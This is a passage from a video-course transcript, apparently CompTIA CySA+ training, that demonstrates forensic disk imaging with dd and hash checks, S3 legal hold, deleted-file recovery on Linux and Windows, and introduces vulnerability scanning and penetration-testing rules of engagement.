workstation. Whether that's something that can be taken on-site, onto a scene in the form of a specially
configured laptop, or even a high-powered desktop PC back in the office. One component is a hard drive
imaging machine. A hard drive imaging machine or component allows you to copy the contents of one hard
disk to another while not making any changes. While not modifying in any aspect the source information,
which is important when it comes to chain of custody.
Now, hard drive imaging hardware is faster than software drive imaging tools. That's usually the case with
hardware. If it's a dedicated piece of hardware that does one task, it's usually faster and more stable than its
software equivalent. There's usually a trade-off. And in this context, the trade-off is that the hard drive imaging
hardware component might not be compatible with all of the newer drives and their disk interfaces. Now
compare that with software drive imaging tools that run as an app within an operating system, like Windows or
Linux. As long as Windows or Linux can see that storage device, so can the drive imaging tool. So you have to
gauge which is more relevant, or perhaps use a hybrid of both. There are also numerous mobile device
acquisition tools, such as those that would plug into a USB port on a smartphone, so to retrieve data, maybe
from the SIM card on the phone, and so on.
[Video description begins] External Hardware Write Blocker [Video description ends]
An external hardware write blocker sits between the suspect storage device and the digital forensic
workstation. The hardware write blocker is a physical device that provides only read access to the suspect
storage device. It's very important with the chain of custody that nothing about the original storage device
itself, as well as the files stored on it, is modified. So the write blocker then will have connectors for power and
data to link to the suspect storage device. Then there's a data cable linking the write blocker component to the
digital forensic workstation. Whether that's an eSATA cable, USB, SATA, Firewire, whatever it is. So at this
point, from the digital forensic workstation, the suspect storage device can be mounted and copied over. While
ensuring that nothing has been modified on the suspect storage device. All of this needs to be documented. The
ID or name of the person performing these tasks, date and timestamps for all aspects of it, the equipment being
used, and the techniques being used.
[Video description begins] Topic title: Digital Forensics Software. The presenter is Dan Lachance. [Video
description ends]
A digital forensics analyst will have both the correct hardware and software in place to properly gather
evidence. Now the software will be installed on a dedicated digital forensic workstation, whether that's a laptop
or a desktop. Now one of the things that might be installed is software for hard drive imaging. Essentially to
take an entire copy of a suspect's hard drive and have another copy on which analysis is then performed. Also
there will be data recovery tools, such as those that might be used to analyze a web browser cache or a disk
partition looking for previously deleted files. There's also software tools on the forensic workstation that might
be used to capture the contents of memory on a suspect device, while it's still running. Whether it's a
smartphone, tablet, server, desktop, whatever the case might be. And then to analyze those memory dumps or
image files.
[Video description begins] Software Disk Image Acquisition [Video description ends]
Software disk image acquisition begins with the forensic workstation having the appropriate software. Pictured
in the diagram, we can see that there is a write blocker device sitting between the forensic workstation and the
suspect storage device. Now in this example, the write blocker is physical, although it could come in software
form. Hardware is usually much more reliable. So the write blocker then has power and data connections to the
suspect storage device and a data connection to the forensic workstation. Purpose of the write blocker is to
prevent the forensic workstation from writing or making any change at all to the suspect storage device.
Because that would violate chain of custody.
[Video description begins] The write blocker has read-only access to suspect storage device. [Video
description ends]
So the suspect disk partitions then are mounted and made available on the digital forensic workstation, read-
only mode. Next, the technician would acquire a disk image of the suspect storage device using a tool. Plenty
of tools out there like AccessData FTK Imager, which would allow you to take an image of either the entire
physical device or a logical drive or a folder on it. Then a unique hash of the drive contents is generated for the
suspect storage device. But it's not written there because we don't want to make any writes to the disk. But it is
taken from what is there. Then we can generate a unique hash of the acquired data. And if we have identical
hashes, it means the copy is accurate. After we make sure we have a digitally forensic-sound hash of the copy
data, then we can perform an analysis on it. And all of this needs to be documented thoroughly to remain
complaint with chain of custody. And then there's the issue of hard to get at or inaccessible data such as on
smartphones.
[Video description begins] Inaccessible Data [Video description ends]
So if we've got a suspect phone that is locked and they are unwilling to unlock the phone, then what can we
do? Because in some cases, the phone might be wiped, the contents of the phone might be wiped after a certain
amount of incorrect passcode attempts. So then we have to think about passwords. In some cases, you might be
able to brute-force passwords for some devices. But, again, that's only as good as knowing how many times an
incorrect password can be entered before the device is wiped. Then there's encryption. What if a passphrase is
required to decrypt the contents or some portion of the contents of a mobile device? What if that's not
supplied? There have been many situations in the past where this has come up. Where the government
demanded that vendors, such as Apple provide a way to get into phones or decrypt something where
companies like Apple have simply refused. And, of course, mysteriously enough, the government withdraws
its request after a period of time, which usually would be an indicator that they somehow were able to get into
the suspect's device anyways.
During this video, you will learn how to create a hard disk image using the Linux dd command.
Objectives
[Video description begins] Topic title: Linux Disk Volume Imaging. The Presenter is Dan Lachance. [Video
description ends]
You can use the Linux dd command to acquire an image of a disk partition for forensic analysis.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
The first thing I'm going to do here in Linux is take a look at the partitioning of the disk devices on this
machine. Now, in a forensic type of situation, you would probably boot through alternative means to get to the
file system on that machine. So I'm going to go ahead and run fdisk -l. So what we've got here is our first
device /dev/sda, which is about 40 GiB in size.
[Video description begins] The output displays the partitions and details like file system type. [Video
description ends]
Then we've got /dev/sdb, which is about 8 GiB. And sdb has been carved up into a partition here, seen as
/dev/sdb1. So it's pretty much the entire disk.
[Video description begins] In the output, for the device /dev/sdb1 he highlights size 8G. [Video description
ends]
What I want to do is make a bit-by-bit copy of sdb1 and store it as an image file for forensic analysis. Now,
that the first thing I'll do though, is generate a unique hash for that. And then we'll generate a hash after we
take an image of it. So I'm going to use the clear command, clear the screen.
[Video description begins] He executes the following command: clear. [Video description ends]
I'm going to use sha256sum, this is a built-in Linux command to generate a unique hash of /dev/sdb1. So
partition one on that device. And I'm going to use the output redirection symbol because on the root, I want to
make a file called sdb1_ orig_hash, and I'll press Enter.
[Video description begins] He executes the following command: sha256sum /dev/sdb1 >
/sdb1_orig_hash. [Video description ends]
So naturally, depending on the size of that disk volume or partition will determine how long this command
takes to execute.
[Video description begins] No output displays and the prompt remains the same. [Video description ends]
And before you know it, it's done. So let's use the cat command to view that hash value. So I'll cat
/sdb1_orig_hash, and there's the unique hash value, the sha256 hash for /dev/sdb1.
[Video description begins] He executes the following command: cat /sdb1_orig_hash. The output displays the
content of the /sdb1_orig_hash file. [Video description ends]
Okay, so now we can use the dd command to actually take a copy of that entire disk partition. So I'll use the dd
command in Linux to do that. Space input file, or if=. So what is it we want to copy? /dev/sdb1. What do we
want to copy it to? So output file, of=, on the root of the file system, which is dev sda1. I'm going to create a
file, let's say called sdb1.img, or image. And I'm going to go ahead and press Enter.
[Video description begins] He executes the following command: dd if=/dev/sdb1 of=/sdb1.img. The output
displays that content of /dev/sdb1 is copied to /sdb1.img. [Video description ends]
Okay, so it looks like it's completed. So if we do an ls of the route and look for anything with the .img
extension, looks like we've got our sdb1.img file. I want to run a hash on that.
[Video description begins] He executes the following command: ls /*.img. The output reads: /initrd.img
/sdb1.img /sdb.img. [Video description ends]
So I'm going to run sha256sum, and it's going to be based on the sdb1.img files stored on the root. So let's just
go ahead and run that and see what it returns back to the screen.
[Video description begins] He executes the following command: sha256sum /sdb1.img. The output displays the
sha256 checksum of the /sdb1.img file in the current directory followed by the given filename. [Video
description ends]
And we can see that the hash that was generated here, looks like it is the exact same as the original hash taken.
[Video description begins] He points to the outputs of the following commands: sha256sum /sdb1.img and
cat /sdb1_orig_hash. [Video description ends]
So we know that we've got a forensically sound copy, bit-by-bit copy of the original source file system that we
can then analyze. So this way, we have a way to determine that nothing was corrupted while things were
copied over. Plus we have a way to determine whether the original file system has been modified.
[Video description begins] Topic title: Legal Hold Cloud Enablement. The presenter is Dan Lachance. [Video
description ends]
[Video description begins] A web site labeled "aws" opens. It includes drop-down buttons labeled "Services"
and "Resource Groups". A web page labeled "AWS Management Console" is open. It includes tiles labeled
"AWS services" and "Access resources on the go". [Video description ends]
And there are times when you might want to make the contents of S3 buckets, in other words, files stored in
the cloud, immutable. In other words, they can't be modified or deleted for a period of time. And that also
includes legal hold, you might be instructed by legal counsel to place a legal hold on some items within an S3
bucket because they can't be tampered with while there are legal proceedings taking place. So how do we do
this? Let's take a look at it in the AWS Management Console.
[Video description begins] The AWS services tile includes a section labeled "Find Services". The Find
Services section includes a search box. In the search box, he types s3. A list of options appears. He clicks an
option labeled "S3". [Video description ends]
I'm going to search up S3, and I'll click on it to open up the S3 Management Console, where we can see we
already have a number of existing buckets.
[Video description begins] A web page labeled "S3 Management Console" opens. It is divided in two parts:
navigation pane and content pane. The navigation pane includes options labeled "Buckets" and "Batch
operations". The Buckets option is selected and the corresponding page is open in the content pane. It includes
a table and a button labeled "+ Create bucket". The table has four columns and several rows. The column
headers are "Bucket name", "Access", "Region", and "Date created". [Video description ends]
We're going to create a new one for this example. So I'll click Create bucket. It's going to be called
testbucketyhz.
[Video description begins] He clicks the + Create bucket button. A wizard labeled "Create bucket" opens. It
contains four steps labeled "Name and region", "Configure options", "Set permissions", and "Review". The
Name and region option is selected and the corresponding page is open. It includes a text box labeled "Bucket
name" and a drop-down list box labeled "Region". [Video description ends]
[Video description begins] In the Bucket name text box, he types testbucketyhz. [Video description ends]
Now, one of the things I'm interested in doing here is scrolling down as I create this bucket.
[Video description begins] In the Region drop-down list box, an option labeled "US East (N. Virginia)" is
selected. He points to the Region drop-down list box. [Video description ends]
[Video description begins] A page labeled "Properties" opens. It includes a section labeled "Advanced
settings". [Video description ends]
[Video description begins] He expands the Advanced settings section. It contains a checkbox labeled
"Permanently allow objects in this bucket to be locked". [Video description ends]
It says, it requires versioning to be enabled. Well, that's just at the top of this page here. So let's turn on
Versioning, which is designed to keep multiple versions of objects stored in S3.
[Video description begins] He selects a checkbox labeled "Keep all versions of an object in the same
bucket". [Video description ends]
So, for example, if you had an Excel document and you made a change and saved it here, you could also
access the previous version. However, that's not why we're turning on Versioning, we're turning it on because
we want Object lock to be enabled. So I'm going to turn on Object lock.
[Video description begins] He selects the Permanently allow objects in this bucket to be locked
checkbox. [Video description ends]
So all we're doing here is turning on the ability to lock the contents of the bucket.
[Video description begins] The Configure options step gets selected. He clicks a button labeled "Next". The Set
permissions step gets selected. He clicks a button labeled "Create bucket". He switches to the S3 Management
Console web page. [Video description ends]
As a matter of fact, it won't be turned on, just the capability will be enabled.
[Video description begins] He clicks the testbucketyhz entry and the corresponding page opens. It includes
tabs labeled "Overview", "Properties", and "Permissions". The Overview tab is selected and the
corresponding tab is open. [Video description ends]
So I'm going go ahead and click Next to proceed through the wizard with all of the rest of the defaults until we
see our newly created bucket.
[Video description begins] He clicks the Properties tab and the corresponding tab opens. It includes a section
labeled "Advanced settings". The Advanced settings section includes tiles labeled "Object lock" and
"Tags". [Video description ends]
[Video description begins] The Object lock tile includes radio buttons labeled "Enable governance mode",
"Enable compliance mode", and "None". [Video description ends]
If I click on the bucket, and if I go into the Properties of it, and if I scroll all the way down, under Advanced
settings and click on Object lock, we can see we have a number of options for something called governance
mode and compliance mode, and it's currently set to None.
[Video description begins] He selects the Enable governance mode radio button and a text box labeled
"Retention period" appears. It contains the value "1". [Video description ends]
Now here, if we enabled governance mode, we can enable governance mode and enable lock by default for a
retention of one day.
[Video description begins] He points to the Retention period text box. [Video description ends]
However, it can be disabled by anyone that's got the specific IAM permissions to turn this off.
[Video description begins] He selects the Enable compliance mode radio button. [Video description ends]
However, we've got compliance mode here that we could enable, for example, if we wanted to set a lock on the
contents of the bucket for one day.
[Video description begins] He points to the Retention period text box. [Video description ends]
We can change that value, that's just the default, one day. Then compliance mode means nobody can disable,
you'd have to wait for the retention period to timeout. Okay, well, that's interesting.
[Video description begins] He selects the Enable governance mode radio button. [Video description ends]
We're going to Enable governance mode and we're just going to set this, let's say, to five days in this example,
and I'll click Save.
[Video description begins] In the Retention period text box, he alters the value from 1 to 5.[Video description
ends]
Now it says after you do this, you won't be able to delete objects that you upload for five days.
[Video description begins] A dialog box labeled "Confirm governance mode" opens. It includes a text box
labeled "To confirm governance mode, type confirm in the field." and a button labeled "Confirm". [Video
description ends]
Okay, that's fine, I'm going to go ahead and type in confirm, and we'll confirm it.
[Video description begins] In the To confirm governance mode, type confirm in the field. text box, he types
"confirm". He clicks the Confirm button. The Confirm governance mode dialog box closes. [Video description
ends]
So the next thing we're going to do is to go back to this bucket under Overview and upload some content.
[Video description begins] He clicks the Overview tab and the corresponding tab opens. It includes a button
labeled "Upload". He clicks the Upload button. A wizard labeled "Upload" opens. It contains steps labeled
"Select files", "Set permissions", "Set properties", and "Review". [Video description ends]
So I've got a sample text file I'm going to upload. I'm just going to keep going through and accept all of the
defaults, and I'm going to upload it. Going to select the link for that uploaded file.
[Video description begins] The Select files step is selected and the corresponding page is open. It includes a
file labeled "CardData.txt" and a button labeled "Next". He clicks the Next button. The Set permissions step
gets selected. He clicks the Next button. The Set properties step gets selected. He clicks a button labeled
"Upload". The Upload wizard closes. A table with four columns and one row appears in the Overview tab. The
column headers are Name, Last modified, Size, and Storage class. [Video description ends]
[Video description begins] Under the Name column header, he clicks the CardData.txt entry and the
corresponding page opens. [Video description ends]
And we're going to look at the Object lock settings for this individual file as opposed to at the bucket level.
[Video description begins] He clicks the Properties tab and the corresponding tab opens. [Video description
ends]
When I go into the Object lock here, we can see we have both Enable governance mode and Enable
compliance mode, notice governance mode is turned on.
[Video description begins] He clicks the Object lock tile. It includes sections labeled "Retention mode" and
"Legal hold". The Retention mode section includes radio buttons labeled "Enable governance mode" and
"Enable compliance mode" and a text box labeled "Retain until date". [Video description ends]
The retention date here turns out to be five days beyond what the current date is, when things will be unlocked.
[Video description begins] In the Retain until date text box, he highlights the value 2020-03-14. [Video
description ends]
So we're retaining governance mode until that date.
[Video description begins] In the Retention mode section, he points to a radio button labeled
"Disable". [Video description ends]
However, of course, we can choose Disable because we have permissions to disable it, but we have an
additional option here.
[Video description begins] He points to the Legal hold section. It contains radio buttons labeled "Enable" and
'Disable". [Video description ends]
And this is for an individual file within the S3 bucket. We can enable Legal hold. It says, legal hold would
prevent the object from being deleted regardless of the retention date above. So it's an override. Well, if we've
been instructed to do so, we can Enable Legal hold, so this file can't be removed from the bucket.
[Video description begins] He selects the Enable radio button. [Video description ends]
[Video description begins] He clicks a button labeled "Save". The Object lock tile closes. [Video description
ends]
Now, if I go back into Object lock, then we can see that legal hold has actually been enabled.
[Video description begins] He clicks the Object lock tile and it opens. In the Legal hold section, he points to
the Enable radio button, which is selected. [Video description ends]
In this video, find out how to restore files that have been deleted in Linux.
Objectives
[Video description begins] Topic title: Linux File Recovery. The presenter is Dan Lachance. [Video
description ends]
In this demonstration, we're going to take a look at how to recover deleted files from removable media on a
Linux host.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:/#. [Video description ends]
So to get started here in Linux, we need to figure out what kind of removable media we've got plugged in. So
I've plugged in a USB thumb drive into this machine.
[Video description begins] He executes the following command: fdisk -l. The output displays the partitions and
details like file system type. [Video description ends]
So if I run fdisk -l to list, then I can see that I've got a device here, /dev/sdd. It's a SanDisk Cruzer USB device,
approximately 3.7 GiB in size. I can see down below it's been carved out into one partition, partition one.
So, /dev/sdd1. Let's go ahead and mount that and see what's in it. So I'm going to type in clear. And I'm going
to mount /dev/sdd1 to a directory on the root of this machine that I've previously created called ext for
external, _drive.
[Video description begins] He executes the following command: mount /dev/sdd1 /ext_drive/. No output
displays and the prompt remains the same.[Video description ends]
[Video description begins] He executes the following command: ls /ext_drive/. The output displays a list of
files and directories. [Video description ends]
However, that's not what we're looking at recovering because we can already see them. We're talking about
recovering previously deleted files, even if that device has been re-partitioned. So in order to do that, we have
to use a special tool.
[Video description begins] He executes the following command: clear. [Video description ends]
And the tool that we're going to use in this particular case is going to be one that's included automatically with
Kali Linux called Foremost. So I'm going to run the foremost command, foremost -i. So, the device I want to
point to here is /dev/sdd. I'm not going to put in one because I don't know how the thing was partitioned in the
past. I want to try to recover whatever I can, -v for verbose and -o for output location. I've got a folder that I've
created already previously on the root called recovered_files. So I'm going to go ahead and tell it that I want to
use that as an output folder.
[Video description begins] He executes the following command: foremost -i /dev/sdd -v -o /recovered_files.
The output displays the information of /dev/sdd. [Video description ends]
And when I press Enter, we can now see it's begun taking a look at the contents of that external drive. And
when it's finished and we'll see because we asked for -v already, we can see it's working. When it's finished,
we'll have a little summary, and then we can take a look at the recovered_files folder to see what's in it. We can
now see it's in the midst of recovering a number of JPG files. Once the output is complete from the foremost
command, we can scroll up and get a bit of a summary. In terms of the number of files that were extracted and
the number per file type, notably a lot of JPG files here.
[Video description begins] In the output, he highlights 2145 FILES EXTRACTED. Also, he highlights the
number of files per type. The types of files include jpg, gif, and zip. [Video description ends]
And so, if we clear the screen and change directory to our output location, the /recovered_files folder and do an
ls.
[Video description begins] He executes the following command: cd /recovered_files/. No output displays and
the prompt changes to root@kali:/recovered_files#. [Video description ends]
[Video description begins] He executes the following command: ls. The output displays a list of files and
directories. [Video description ends]
[Video description begins] He executes the following command: cd jpg. No output displays and the prompt
changes to root@kali:/recovered_files/jpg#. [Video description ends]
Then we can do an ls, for example, ls -l, long listing of all of the files here.
[Video description begins] He executes the following command: ls -l. The output displays a list of files and
directories in long list format. [Video description ends]
And you can see that there's a variety of different file sizes for each of these JPG files.
[Video description begins] He executes the following command: clear. He executes the following command:
cd... No output displays and the prompt changes to root@kali:/recovered_files#. He executes the following
command: clear. He executes the following command: ls. The output displays a list of files and
directories. [Video description ends]
So at this point, it's a matter of using the appropriate tools to further analyze the contents of what was
recovered from the previously deleted file systems on the removable USB thumb drive.
[Video description begins] Topic title: Windows File Recovery. The presenter is Dan Lachance. [Video
description ends]
Normally when you delete a file in Windows, it shows up in the Recycle Bin.
[Video description begins] He clicks the Recycle Bin icon. The file explorer window opens. It is divided in two
parts: navigation pane and content pane. The navigation pane includes options labeled "Downloads" and
"Pictures". [Video description ends]
Unless you've emptied the Recycle Bin or you've deleted a file, for example, while holding down the Shift key
to bypass the Recycle Bin. Now even though it doesn't appear the file is still on disk, it can be retrieved using
the right tools. As long as the disk hasn't been completely overwritten with random characters, you might be
able to get it back. So I'm going to go here to my Downloads folder, where I've got a file undeletion tool here.
[Video description begins] He clicks the Downloads option and the corresponding subfolder opens. It contains
folders labeled "FileUndelete" and "HardDiskScrubber_34". He clicks the FileUndelete folder and the
corresponding subfolder opens. It includes an application labeled "Restoration". [Video description ends]
Go ahead and run the program. And I'm going to tell it to show me deleted files on drive D on this host.
[Video description begins] He clicks the Restoration application. A dialog box labeled "Restoration Version
3.2.13" opens. It is divided in two parts. The first part contains a table with several columns and no rows. The
column headers include Name and Size. The second part includes a drop-down list box labeled "Drives", a
button labeled "Search Deleted Files", a text box labeled "All or part of the file", and a button labeled
"Restore by Copying".[Video description ends]
[Video description begins] In the Drives drop-down list, he selects an option labeled "New volume
(D:)". [Video description ends]
Now I could put in a filter here, but I want to see them all.
[Video description begins] He points to the Search Deleted Files button. [Video description ends]
So here I now see a listing of all of the deleted files from this disk volume.
[Video description begins] He points to the All or part of the file text box and clicks the Search Deleted Files
button. The table gets populated. [Video description ends]
And I can see, for example, at the very top, even the file name is available, and the original location of it.
[Video description begins] He points to the Name and In Folder columns. He highlights a row where entries
under the Name and In Folder column headers are CreditCardData.txt and D:\SampleFiles
respectively. [Video description ends]
So I've got a file here called CreditCardData that used to exist on drive D under SampleFiles.
[Video description begins] In the navigation pane, he clicks an option labeled "New volume (D:)" and the
corresponding subfolder opens. It includes folders labeled "Budgets" and "SampleFiles". [Video description
ends]
Now if we go to drive D, look under SampleFiles, there's nothing here called CreditCardData.
[Video description begins] He clicks the SampleFiles folder and the corresponding subfolder opens. It
includes a file labeled "CustomerTransactions.xslx". [Video description ends]
And as we saw, the Windows Recycle Bin was empty. Let's go ahead and try to restore this.
[Video description begins] He switches to the Restoration Version 3.2.13 dialog box. The row where entries
under the Name and In Folder column headers are CreditCardData.txt and D:\SampleFiles respectively is
selected. [Video description ends]
So I selected that file, going to go ahead and choose Restore by Copying. Now there are a lot of tools out there
that will let you recover only a certain amount of data if you're running it in trial mode, until you actually
purchase a subscription. So in this case, I'm just going to click Restore by Copying.
[Video description begins] A dialog box labeled "Save As" opens. It is divided in two parts: navigation pane
and content pane. The navigation pane includes options labeled "Downloads" and "Desktop". [Video
description ends]
It wants to know where to restore it. Why don't we put it directly in the Downloads folder?
[Video description begins] He clicks the Downloads option. A text box labeled "File name" contains the value
CreditCardData. He clicks a button labeled "Save". The Save As dialog box closes. [Video description ends]
[Video description begins] He closes the Restoration Version 3.2.13 dialog box. [Video description ends]
[Video description begins] In the file explorer window, he clicks the Downloads option and the corresponding
subfolder opens. It includes a file labeled "CreditCardData". [Video description ends]
[Video description begins] He clicks the CreditCardData file and the corresponding file opens in
Notepad. [Video description ends]
So given the right tools and access to a disk volume, it doesn't take very much knowledge or effort to recover
deleted files.
[Video description begins] Topic title: Linux File System Mounting. The presenter is Dan Lachance. [Video
description ends]
As part of evidence gathering with digital forensics, there are times when you may want to make a copy of a
Linux disk partition.
[Video description begins] The Terminal window opens. The following prompt is displayed:
root@kali:~#. [Video description ends]
And then analyze it later. So let's take a look at an existing Linux environment here. If I do an ls of the root of
the file system looking for files that end with img, I can see I've got a file called sdb1.img.
[Video description begins] He executes the following command: ls /*.img. The output reads: /initrd.img
/sdb1.img /sdb.img.[Video description ends]
Now that references the fact that we've got the second disk device on a Linux system, sdb, and partition 1.
[Video description begins] In the output, he highlights /sdb1.img. [Video description ends]
That was copied, presumably using the dd command, into an image file. Now, the file extension doesn't hold
the same relevance here in Linux as it does in Windows. Doesn't really matter if there's a file extension or not.
The key is that we need to be able to generate a hash value of that image. To determine if we're working with
the exact same file system contents as the original. So we can do that by running sha256sum, in this case
against that file. Now when we do that, we can then see what the returned value is. And compare it against the
sha256sum value that results against the original file system.
[Video description begins] He executes the following command: sha256sum /sdb1.img. [Video description
ends]
If they're the same, it means we have an exact bit-by-bit copy. Otherwise, if they're different, it means
something has changed.
[Video description begins] The output displays the checksum followed by the /sdb1.img file name. He points to
the alphanumeric checksum. [Video description ends]
So we can now see we have a unique SHA256 hash value of that image file. And we could actually compare
that to what might have been recorded of the original source location. In other words, the original hash of the
original real file system. I've got that here, I'm going to cat that, it's on the root. It's called sdb1_orig_hash.
[Video description begins] He executes the following command: cat /sdb1_orig_hash. The output displays the
content of the /sdb1_orig_hash file. [Video description ends]
And sure enough, the hashes match. So I know I've got a valid copy of that.
[Video description begins] He points to the outputs of sha256sum /sdb1.img and cat /sdb1_orig_hash
commands. [Video description ends]
Now, to be able to get into that image of that Linux file system, I need to mount it so I can start to examine it.
So in order to do that, I'm going to make a directory. And I'm going to create it on the root here. So I'm going
to create it using the mkdir command. And I'm going to call it analyze.
[Video description begins] He executes the following command: mkdir /analyze. No output displays and the
prompt remains the same. [Video description ends]
And I'm going to mount that device into the analyze folder.
[Video description begins] He executes the following command: mount. No output displays and the prompt
remains the same.[Video description ends]
[Video description begins] He executes the following command: ls /analyze. No output displays and the
prompt remains the same. [Video description ends]
Nothing has been mounted, so I'm going to go ahead and mount /sdb1.img to /analyze.
[Video description begins] He executes the following command: mount /sdb1.img /analyze/. No output displays
and the prompt remains the same. [Video description ends]
And when I do an ls of /analyze again, we're going to see now that we can actually see files.
[Video description begins] He executes the following command: ls /analyze/. The output displays a list of files
and directories. [Video description ends]
So at this point, we would be able to run whatever forensic analysis tools are necessary to take a look at file
contents. Perhaps recover deleted files, and so on.
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, we've examined digital forensics, including the proper gathering and handling of digital
evidence. And common digital forensics, hardware and software solutions. We did this by exploring the
purpose of digital forensics. We talked about the importance of the chain of custody for proper evidence
gathering and handling. And we also discussed common digital forensics hardware and software solutions.
Next, we talked about how to image a Linux drive using the dd command. How to enable legal hold for an
AWS S3 bucket. And finally, how to restore deleted files on both the Linux and Windows platforms. In our
next course, we'll move on to explore network scanning and traffic analysis techniques that are available to
help secure an organization's networks, hosts, apps, and data. Including looking at vulnerability scanning,
penetration testing, and intrusion detection and prevention.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The presenter is Dan Lachance, an IT Trainer /
Consultant. [Video description ends]
Hi, I'm Dan Lachance. I've worked in various IT roles since the early 1990s, including as a technical trainer, as
a programmer, a consultant, as well as an IT tech author and editor. I've held and still hold IT certifications
related to Linux, Novell, Lotus, CompTIA, and Microsoft. Some of my specialties over the years have
included networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting
across a wide array of Microsoft products. The CS0-002 CompTIA Cybersecurity Analyst, or CySA+
certification exam, is designed for IT professionals looking to gain security analyst skills. To perform data
analysis. To identify vulnerabilities, threats and risks to an organization. To configure and use threat detection
tools. And secure and protect an organization's applications and systems.
In this course, we're going to explore how to identify security weaknesses that may exist in networks, hosts,
and apps using techniques such as vulnerability scanning and penetration testing. I'll start by examining how
vulnerability scanning can identify security weaknesses. And how penetration testing can identify and exploit
security weaknesses. I'll then explore the Metasploit Framework, demonstrate how to run an end map network
scan, and show how to identify changes using network scanning comparisons. Next, I'll demonstrate how to
run both a Nessus and an OpenVAS vulnerability scan. Lastly, I'll use the hping tool to generate network SYN
flood traffic.
[Video description begins] Topic title: Vulnerability Scanning. The presenter is Dan Lachance. [Video
description ends]
Vulnerability scanning is a very important IT security activity. It should be run periodically to determine an
organization's security posture and for continuous security control improvement. Vulnerability scanning is all
about identifying weaknesses. Whether those weaknesses exist at the network level, on a specific host, or even
within a host, within a particular application. So depending on the type of vulnerability scanning that you need
to conduct will determine which tool you use to perform the task.
This type of scanning is considered passive and that's because when you look for vulnerabilities, you are
simply seeking weaknesses. But not choosing to exploit them as you would be with a penetration test, which is
considered much more intrusive. There are a lot of tools available to perform vulnerability scans including
Nessus, OpenVAS and Qualys. Many of these tools supports something called the Security Content
Automation Protocol, or for short, SCAP. The purpose of SCAP is to use automation to monitor security
incidents. And to ensure that devices and hosts on the network are compliant with established security
standard, security configurations.
[Video description begins] The Vulnerability Scanning Process. [Video description ends]
Vulnerability scanning can be conducted legitimately by IT security technicians. But also maliciously by
malicious actors that are seeking to perform reconnaissance. So either way, the scanning process begins with
scanning an entire network. Now in order for that to happen, the scanner has to have access to the network. So
a malicious user, for instance would have to connect to a Wi-Fi or a wired network in order to begin to conduct
the scan. Now, even though they might not be able to themselves get their device on the network.
Another option for a malicious user would be to fool somebody through social engineering to click on
something. Which might trigger malware to run on their machine, the victim machine which is already on the
inside. And then from there, the scan can take place and the results can be sent to an anonymous account out
on the Internet. So there are a lot of ways that this can actually take place. So after scanning the network, the
next order of business is to scan the devices on the network. Specifically, those devices that show up as being
responsive and running particular services. After which those devices can be scanned looking for specific
vulnerabilities. For example, if we have got a Windows server running the IIS or Internet Information Services
web server stack. Then the vulnerability scanning tool can use a vulnerability database, which ideally is up-to-
date. Looking for specific vulnerabilities for that version of that software.
[Video description begins] Vulnerability Scanning Considerations. [Video description ends]
The first thing we should consider with vulnerability scanning is we might trigger some alarms out on the
network. So, if you've got a centralized SIEM solution for centralized security incident monitoring, you could
trigger some rules. Correlation rules are used to identify anomalies on the network and then generate some
kind of an action. Such as an alarm that might be triggered and a notification sent to administrators when
malware infections are detected. And taking that a step further with SIEM, you might even have a SIEM
model, which essentially profiles an app or a user. And from that profile can determine any deviations from the
norm. Either way, these could be triggered when running vulnerability scans. So it's something to think about.
In order for the results of the vulnerability scan to have a lot of meaning, you need to decide what's normal in
your environment. Is it normal that there are a lot of workstations out on the network with shared folders
running a web server stack? And we're talking about client stations, is that normal in your environment? It
might be, if those users are software developers and need those tools. We need to keep our vulnerabilities
database up-to-date. So a vulnerability scanner uses a database that it checks when it is connecting to devices
on the network. Looking for specific detailed vulnerabilities for specific software versions. So you want to
make sure that the vulnerabilities database is always kept up-to-date. You have to determine the scope or the
scan targets that will be scanned in the first place. You have to determine in your vulnerability scanning tool, if
you could use credentialed or non-credentialed scans.
A credentialed scan means you are entering in credentials that can be used when attempting connectivity to
devices on the network. Now, if you really want to test what it would be like for malicious user that doesn't
have access to those credentials. You could run a non-credentialed scan. To get a sense of what it might look
like if there was malware or a malicious user performing the scan on an internal network. Both have their
place, both are important. Because a credentialed scan might point out security weaknesses that otherwise
wouldn't show up with a non-credentialed scan. So both are important. Then there's the reporting aspect to
identify perhaps any changes. You can run vulnerability scans periodically and you should. And you can
compare them, and by comparing them you can see anything that's changed. As in, why are there now some
new Linux hosts and wireless access points on the network when they didn't show up in last week's
vulnerability scan?
After completing this video, you will be able to recognize how pen testing identifies and exploits security
weaknesses.
Objectives
[Video description begins] Topic title: Penetration Testing. The presenter is Dan Lachance. [Video description
ends]
Penetration testing actively discovers vulnerabilities on hosts on the network and including with specific apps
running on those hosts. And it attempts to exploit those discovered vulnerabilities.
There are a number of attributes that a penetration tester should have and this is at the personality trait level.
First skill set would be knowledge of operating systems and network protocols. So for instance, understanding,
not only Windows, but Linux variants, how to work at the command-line. Understanding how packets are sent
over a network and how to dissect a packet capture that was taken from the network. So a knowledge of
network protocols is important. A knowledge of IT infrastructure hardware, storage arrays, UPS systems,
server hardware, routers, switches, VPN appliances.
All of this is going to be very important for the pen tester. A knowledge of where to get threat intelligence
information, there are numerous threat intelligence sources available out on the Internet. And of course, a
penetration tester has to have a passion for IT. They have to be a self-learner and like to solve problems. Pen
testers should really have the ability to write scripts or code. The language isn't important. But having an
understanding of how to manipulate at least one scripting or programming language is generally considered
important for pen testers. They need to have a persistent personality. That kind of links back to the problem
solver trait of a pen tester.
[Video description begins] Pen Test - Rules of Engagement. [Video description ends]
There are normally rules of engagement before engaging in a penetration test. Such as the scheduling, when it
will occur. The fact that there could be potential service disruptions. So this means that if we are legitimately
conducting a pen test for an organization, we need to make sure that we've got sign-off, legal documentation,
assuring that the scheduling makes sense and that there could be service disruptions. And that that is an
acceptable risk. Often, rules of engagement will also include a non-disclosure agreement needing to be signed,
in case, pen testers come across sensitive information due to vulnerabilities having been successfully exploited.
[Video description begins] Non-disclosure agreement abbreviates to NDA. [Video description ends]
If you're pen testing in a cloud environment, make sure you read up on that cloud provider's details related to
pen testing. While some pen tests might be allowed even without express written permission from the cloud
provider, others like denial-of-service attacks might be strictly prohibited, since it could affect other cloud
tenants.
Pen testing uses the notion of red and blue teams. The red team is the team that executes the pen tests at the
network level, against network devices, and of course, against applications and databases that might exhibit
weaknesses. So it simulates real world attacks. The blue team monitors for these security events. So it's more
